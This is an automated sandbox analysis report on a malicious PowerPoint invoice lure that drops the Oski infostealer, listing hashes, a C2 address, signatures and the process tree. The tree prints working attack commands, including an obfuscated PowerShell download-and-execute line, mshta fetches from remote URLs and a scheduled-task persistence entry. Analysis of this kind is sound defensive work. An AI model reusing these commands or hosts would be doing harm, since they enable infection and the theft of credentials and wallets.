Analysis

  • max time kernel
    77s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    14-07-2021 07:12

General

  • Target

    DSV INV 103823 14072021.ppt

  • Size

    58KB

  • MD5

    4c5105952fcc267dc7b8bf5a2220fb51

  • SHA1

    9f43f9de80672d5d228d254394360ae362d9a673

  • SHA256

    5bd1784bd0379cb65a32f1c71989082c6b9168c150e18ba21b351b2320f667da

  • SHA512

    88f09a875c5e6164fec848a535b2601262e90f4c110ebf34acbdbc31bccc6684c1d2f98359347c325354197a252d02b644da4e20e7d68365a52cca736590a540

Malware Config

Extracted

Family

oski

C2

103.153.76.164/we/mark/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 15 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DSV INV 103823 14072021.ppt" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\SYSTEM32\mshta.exe
      mshta https://bitly.com/dhjkaydajkwyquibxcasad
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Checks processor information in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 ;i'E'x(iwr('https://ia801508.us.archive.org/9/items/qw_20210713/mark.txt') -useB)
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3016
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:4228
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /pid 4228 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe & RD /S /Q C:\\ProgramData\\204518476636547\\* & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4320
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /pid 4228
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4364
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""https://randikhanaekminar.blogspot.com/p/mark.html"
        3⤵
        • Creates scheduled task(s)
        PID:2096
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 3748 -s 3016
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4128

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Credential Access

Credentials in Files

1
T1081

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Collection

Data from Local System

1
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • \ProgramData\mozglue.dll
    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

  • \ProgramData\nss3.dll
    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

  • \ProgramData\sqlite3.dll
    MD5

    e477a96c8f2b18d6b5c27bde49c990bf

    SHA1

    e980c9bf41330d1e5bd04556db4646a0210f7409

    SHA256

    16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

    SHA512

    335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

  • memory/2096-284-0x0000000000000000-mapping.dmp
  • memory/2840-123-0x00007FFFD7C90000-0x00007FFFD9B85000-memory.dmp
    Filesize

    31.0MB

  • memory/2840-118-0x00007FFFE0770000-0x00007FFFE234D000-memory.dmp
    Filesize

    27.9MB

  • memory/2840-122-0x00007FFFDCD30000-0x00007FFFDDE1E000-memory.dmp
    Filesize

    16.9MB

  • memory/2840-114-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-115-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-279-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-280-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-281-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-282-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-116-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-119-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/2840-117-0x00007FFFBE230000-0x00007FFFBE240000-memory.dmp
    Filesize

    64KB

  • memory/3016-296-0x0000018E357C0000-0x0000018E357C2000-memory.dmp
    Filesize

    8KB

  • memory/3016-293-0x0000018E36240000-0x0000018E36241000-memory.dmp
    Filesize

    4KB

  • memory/3016-297-0x0000018E357C3000-0x0000018E357C5000-memory.dmp
    Filesize

    8KB

  • memory/3016-301-0x0000018E357C6000-0x0000018E357C8000-memory.dmp
    Filesize

    8KB

  • memory/3016-303-0x0000018E361D0000-0x0000018E361D3000-memory.dmp
    Filesize

    12KB

  • memory/3016-290-0x0000018E36090000-0x0000018E36091000-memory.dmp
    Filesize

    4KB

  • memory/3016-283-0x0000000000000000-mapping.dmp
  • memory/3748-247-0x0000000000000000-mapping.dmp
  • memory/4228-304-0x0000000000400000-0x0000000000438000-memory.dmp
    Filesize

    224KB

  • memory/4228-305-0x000000000040717B-mapping.dmp
  • memory/4228-309-0x0000000000400000-0x0000000000438000-memory.dmp
    Filesize

    224KB

  • memory/4320-313-0x0000000000000000-mapping.dmp
  • memory/4364-314-0x0000000000000000-mapping.dmp